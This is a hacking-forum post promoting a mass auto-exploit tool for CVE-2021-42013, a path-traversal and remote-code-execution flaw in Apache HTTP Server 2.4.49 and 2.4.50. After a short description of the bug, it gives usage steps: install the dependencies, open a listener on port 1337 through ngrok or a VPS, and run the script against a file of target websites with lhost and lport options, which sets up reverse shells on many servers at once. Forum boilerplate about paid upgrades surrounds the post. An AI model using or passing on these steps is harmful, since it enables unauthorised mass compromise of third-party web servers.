[ Tool ] MASS-CVE-2021-42013 💚 Auto Exploit🔥

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

DRCrypter

Administrator
.
.
Jun 3, 2023
Threads
272
399
93
Screenshot_2024-01-15_08-14-03.png
CVE-2021-42013 is a critical vulnerability in Apache HTTP Server 2.4.49 & 2.4.50 that allows remote code execution (RCE) via a path traversal attack.

🔍 What’s the Issue?
It exploits a misconfiguration in mod_proxy.
Attackers can access restricted files or execute arbitrary commands on the server.
It affects Apache 2.4.49 & 2.4.50 (but is fixed in 2.4.51).

This vulnerability exploits a path traversal attack vector, allowing attackers to manipulate URLs, mapping them to files outside the intended directories configured by Alias-like directives. When these files lack proper protection, such as the "require all denied" configuration, attackers can exploit this vulnerability by executing commands from the vulnerable path.

# Exploitation and Impact 💥

The severity of this vulnerability escalates if CGI scripts are enabled for the aliased paths. Exploiting CVE-2021-42013 grants attackers the ability to remotely execute arbitrary code on the targeted server, potentially leading to a complete system compromise as seen below.

1.You must have python3 and install command : python3 pip install rich alive-progress

2.Setup your local with ngrok tcp (premium member only because nothing good free they are expired test as my forms now lol) 1337 or need own vps to port forward 1337

3.Command run tools : python3 CVE-2021-42013.py --file target_website.txt --lhost ngrok_host --lport 1337 --threads 10


drcrypter or drcrypter_ru

 

Forum statistics

Threads
1,835
Messages
35,566
Members
9,897
Latest member
йцукенг
Member time online
794d 14h 34m
Reputation(s)
26